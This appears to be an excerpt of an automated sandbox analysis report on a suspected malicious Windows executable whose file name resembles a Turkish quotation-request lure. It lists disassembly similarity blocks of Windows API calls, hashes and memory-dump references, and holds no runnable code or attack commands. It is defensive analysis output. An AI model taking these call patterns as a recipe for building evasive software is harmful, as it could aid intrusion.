                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: f4094be47c3d70794f89114a1e63e0801b2e17035f0088b64ee4e1604d0ff5c7
                                                                                                                                    • Instruction ID: 493a62f0a5ad621815a0e89f2ed47ecec3de3a78b8150363411968330f036f84
                                                                                                                                    • Opcode Fuzzy Hash: f4094be47c3d70794f89114a1e63e0801b2e17035f0088b64ee4e1604d0ff5c7
                                                                                                                                    • Instruction Fuzzy Hash: A811393AD01259FFEB10DBA5CD85FADBB79EB48750F2000A1EA01B7290D7716E50DB94
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001EE1FD
                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 001EE230
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001EE246
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001EE24D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                    • Opcode ID: 81bceb2948686ebaad94d0a7f4ae90f3c038237d5e3692d2bbce3869cbbe82e1
                                                                                                                                    • Instruction ID: 543ee8324e56b0fca3627876cd11075eb6922d7b6a66ad18c8a9d7439aa45981
                                                                                                                                    • Opcode Fuzzy Hash: 81bceb2948686ebaad94d0a7f4ae90f3c038237d5e3692d2bbce3869cbbe82e1
                                                                                                                                    • Instruction Fuzzy Hash: E811087A904255BBC7019FA8BC0DBDE7FAC9B45321F108255F925D3290D7B0890487A0
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNEL32(00000000,?,001ACFF9,00000000,00000004,00000000), ref: 001AD218
                                                                                                                                    • GetLastError.KERNEL32 ref: 001AD224
                                                                                                                                    • __dosmaperr.LIBCMT ref: 001AD22B
                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 001AD249
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 173952441-0
                                                                                                                                    • Opcode ID: b92dba293b8eaa077ba71622408a661a2604d0e1ff9769ba536666b392cf2040
                                                                                                                                    • Instruction ID: bf94c438bef13abe1670563b577b27c3236d7e53a7caf7876b32560fe7200ef2
                                                                                                                                    • Opcode Fuzzy Hash: b92dba293b8eaa077ba71622408a661a2604d0e1ff9769ba536666b392cf2040
                                                                                                                                    • Instruction Fuzzy Hash: D201D67E4455047BC7116BA5EC09BAE7A69DF93330F20425AF926925D0DF70C905C6A0
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0018604C
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00186060
                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0018606A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                    • Opcode ID: 651830dda14b4daf496bfd8f5766a86872a2792cde72ee4c12a03d5a1c6d4bc1
                                                                                                                                    • Instruction ID: 0b43fe52e3d74a6b5d077544118ec868737b9e0ce67390828cf8dd36866b88f4
                                                                                                                                    • Opcode Fuzzy Hash: 651830dda14b4daf496bfd8f5766a86872a2792cde72ee4c12a03d5a1c6d4bc1
                                                                                                                                    • Instruction Fuzzy Hash: 9411AD72101508BFEF165FA49C48EEABB6DEF183A4F104205FA0452110CB36DD60DFA4
                                                                                                                                    APIs
                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 001A3B56
                                                                                                                                      • Part of subcall function 001A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 001A3AD2
                                                                                                                                      • Part of subcall function 001A3AA3: ___AdjustPointer.LIBCMT ref: 001A3AED
                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 001A3B6B
                                                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 001A3B7C
                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 001A3BA4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 737400349-0
                                                                                                                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                    • Instruction ID: cab9de5d83afc1d6b6022b67b0fb2fc8224a42260f2ecc0ec4951937660f6bcd
                                                                                                                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                    • Instruction Fuzzy Hash: D7014C36100148BBDF125E95DC42EEB7F6EEF9A754F044014FE5896121C772E961EBA0
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001813C6,00000000,00000000,?,001B301A,001813C6,00000000,00000000,00000000,?,001B328B,00000006,FlsSetValue), ref: 001B30A5
                                                                                                                                    • GetLastError.KERNEL32(?,001B301A,001813C6,00000000,00000000,00000000,?,001B328B,00000006,FlsSetValue,00222290,FlsSetValue,00000000,00000364,?,001B2E46), ref: 001B30B1
                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001B301A,001813C6,00000000,00000000,00000000,?,001B328B,00000006,FlsSetValue,00222290,FlsSetValue,00000000), ref: 001B30BF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                    • Opcode ID: adc47acd30c47889a6f3304bfe401a745a8cc2731c539fa71def087377780fcd
                                                                                                                                    • Instruction ID: 479e3d75ed82c9e5a37c8f1957f27bd53424f93ff1d96105658ccca1b6b7b798
                                                                                                                                    • Opcode Fuzzy Hash: adc47acd30c47889a6f3304bfe401a745a8cc2731c539fa71def087377780fcd
                                                                                                                                    • Instruction Fuzzy Hash: 9E01F73A745332ABCB315B78BC489E77B98AF55B61B214620FD26E3140CF31D911C6E0
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 001E747F
                                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001E7497
                                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001E74AC
                                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001E74CA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1352324309-0
                                                                                                                                    • Opcode ID: a493f59941fa36955b3f626c2c171d78485f2e4fadada581d57d4329890db852
                                                                                                                                    • Instruction ID: 3c4b45774a18fec1f9b4d53b00743bd947b942f7940dca7ce0f136c22abf95f0
                                                                                                                                    • Opcode Fuzzy Hash: a493f59941fa36955b3f626c2c171d78485f2e4fadada581d57d4329890db852
                                                                                                                                    • Instruction Fuzzy Hash: 75118EB5249754ABF7208F15EC0CB967BFCEB00B00F108569A616D61D1DB70E944DB60
                                                                                                                                    APIs
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001EACD3,?,00008000), ref: 001EB0C4
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001EACD3,?,00008000), ref: 001EB0E9
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001EACD3,?,00008000), ref: 001EB0F3
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001EACD3,?,00008000), ref: 001EB126
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                    • Opcode ID: 104d9a11e3e75ab4bc0711d475fc09ed41f7c5cd6200330f8f09fe0247ae9838
                                                                                                                                    • Instruction ID: 8d76d555a57f27f14c289111c06fe79e8ff66403ab31271894ecd4dfd8f0a845
                                                                                                                                    • Opcode Fuzzy Hash: 104d9a11e3e75ab4bc0711d475fc09ed41f7c5cd6200330f8f09fe0247ae9838
                                                                                                                                    • Instruction Fuzzy Hash: 98117970C44A68E7CF04AFE6E9A86EFBB78FF19720F118096E941B2181CB3056509B51
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E2DC5
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 001E2DD6
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001E2DDD
                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001E2DE4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                    • Opcode ID: b13d52b0b6538fb104c50564d248678018292838083f976996f1a14f8f3bf774
                                                                                                                                    • Instruction ID: f1e9837e3b36c6253290564876bcf62e23192b4dd89c5dca685757a19ddcf84c
                                                                                                                                    • Opcode Fuzzy Hash: b13d52b0b6538fb104c50564d248678018292838083f976996f1a14f8f3bf774
                                                                                                                                    • Instruction Fuzzy Hash: 55E06D755816647AD7201BA3AC0DEEB3E6CFBA2BA1F104125F205D1080DEA08840C6B0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00199693
                                                                                                                                      • Part of subcall function 00199639: SelectObject.GDI32(?,00000000), ref: 001996A2
                                                                                                                                      • Part of subcall function 00199639: BeginPath.GDI32(?), ref: 001996B9
                                                                                                                                      • Part of subcall function 00199639: SelectObject.GDI32(?,00000000), ref: 001996E2
                                                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00218887
                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00218894
                                                                                                                                    • EndPath.GDI32(?), ref: 002188A4
                                                                                                                                    • StrokePath.GDI32(?), ref: 002188B2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                    • Opcode ID: dc1f47fe8bddcc6daeff8ddc39adffdade6562dd655d6b895819d0b2a41ca08b
                                                                                                                                    • Instruction ID: 9b618df6961a43dc3673bd74733e774c0de2bf1426d66989168ec6c63336d318
                                                                                                                                    • Opcode Fuzzy Hash: dc1f47fe8bddcc6daeff8ddc39adffdade6562dd655d6b895819d0b2a41ca08b
                                                                                                                                    • Instruction Fuzzy Hash: 01F05E3A081259FADB125F94BC0EFCE3F59AF2A311F248000FA11650E1CB755561CFE9
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000008), ref: 001998CC
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 001998D6
                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 001998E9
                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 001998F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4037423528-0
                                                                                                                                    • Opcode ID: 4b51e290ae98ad0799c85b93c172a3d2d1e9c8007663107a00f6171457e4004a
                                                                                                                                    • Instruction ID: 7ed24c1a4871f3da675df05be6a54f6cdc7d52b65093c2742951bd09c95f1084
                                                                                                                                    • Opcode Fuzzy Hash: 4b51e290ae98ad0799c85b93c172a3d2d1e9c8007663107a00f6171457e4004a
                                                                                                                                    • Instruction Fuzzy Hash: 08E065352C4240BADF215B74BC0DBE93F11AB21335F24C21AF6F9541E1C77146409F11
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 001E1634
                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,001E11D9), ref: 001E163B
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001E11D9), ref: 001E1648
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,001E11D9), ref: 001E164F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                    • Opcode ID: 43f9706b65c444fccbdcebafca67e5ef4742d108aa3a3a33c1a5043d1de32413
                                                                                                                                    • Instruction ID: 703ae75c565b1787a5fa1d42ee03f9c05118eb06e13767f22999f5d93bcd3b3e
                                                                                                                                    • Opcode Fuzzy Hash: 43f9706b65c444fccbdcebafca67e5ef4742d108aa3a3a33c1a5043d1de32413
                                                                                                                                    • Instruction Fuzzy Hash: 3DE08639641211EBD7201FA1BD0DBCB3B7CBF68791F24C808F645C9080DB744540C750
                                                                                                                                    APIs
                                                                                                                                    • GetDesktopWindow.USER32 ref: 001DD858
                                                                                                                                    • GetDC.USER32(00000000), ref: 001DD862
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001DD882
                                                                                                                                    • ReleaseDC.USER32(?), ref: 001DD8A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                    • Opcode ID: 31cab3f434ec0b4be761b805700291260dda0451a879e13bc2d9622758d21a73
                                                                                                                                    • Instruction ID: b8a312a6080d78b14d389e47153c7a06adf626b62204f81b82cb71b1d31e5b3d
                                                                                                                                    • Opcode Fuzzy Hash: 31cab3f434ec0b4be761b805700291260dda0451a879e13bc2d9622758d21a73
                                                                                                                                    • Instruction Fuzzy Hash: 16E01278840204DFCF419FA0E80C6ADBBB5FB58310F25D005F91AE7250CB354501AF50
                                                                                                                                    APIs
                                                                                                                                    • GetDesktopWindow.USER32 ref: 001DD86C
                                                                                                                                    • GetDC.USER32(00000000), ref: 001DD876
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001DD882
                                                                                                                                    • ReleaseDC.USER32(?), ref: 001DD8A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                    • Opcode ID: bf0c02a54abc171166626527477988940231deca18f47bb3870928ac0c4aa594
                                                                                                                                    • Instruction ID: 571d00ce62ddcd12e5311af759e3f99a48c28f7c8c662866f463052b3798d0b1
                                                                                                                                    • Opcode Fuzzy Hash: bf0c02a54abc171166626527477988940231deca18f47bb3870928ac0c4aa594
                                                                                                                                    • Instruction Fuzzy Hash: 7BE09A79C40204DFCF51AFA4E80C6AEBBB5BB68311B249449F95AE7250CB395A019F50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00187620: _wcslen.LIBCMT ref: 00187625
                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 001F4ED4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Connection_wcslen
                                                                                                                                    • String ID: *$LPT
                                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                                    • Opcode ID: 9cdd8438ba37efef1e0cea5e961f6251a988ec5ad5ac2d0be7bc796c748e708d
